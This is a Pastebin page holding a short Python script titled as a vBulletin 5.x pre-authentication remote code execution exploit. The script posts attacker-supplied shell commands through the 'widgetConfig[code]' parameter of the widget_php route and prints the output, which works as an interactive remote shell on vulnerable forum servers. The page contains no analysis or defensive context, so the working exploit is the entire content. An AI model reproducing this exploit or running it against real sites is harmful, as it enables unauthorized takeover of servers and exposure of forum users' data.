API tools faq
paste
ToKeiChun

vBulletin 5.x 0day pre-auth RCE exploit

ToKeiChun
Oct 5th, 2019
687
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.74 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. #
  3. # vBulletin 5.x 0day pre-auth RCE exploit
  4. #
  5. # This should work on all versions from 5.0.0 till 5.5.4
  6.  
  7. import requests
  8. import sys
  9.  
  10. if len(sys.argv) != 2:
  11. sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
  12.  
  13. params = {"routestring":"ajax/render/widget_php"}
  14.  
  15. while True:
  16. try:
  17. cmd = raw_input("vBulletin$ ")
  18. params["widgetConfig[code]"] = "echo passthru('"+cmd+"'); exit;"
  19. r = requests.post(url = sys.argv[1], data = params)
  20. if r.status_code == 200:
  21. print r.text
  22. else:
  23. sys.exit("Exploit failed!")
  24. except KeyboardInterrupt:
  25. sys.exit("\nClosing shell...")
  26. except Exception, e:
  27. sys.exit(str(e))
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!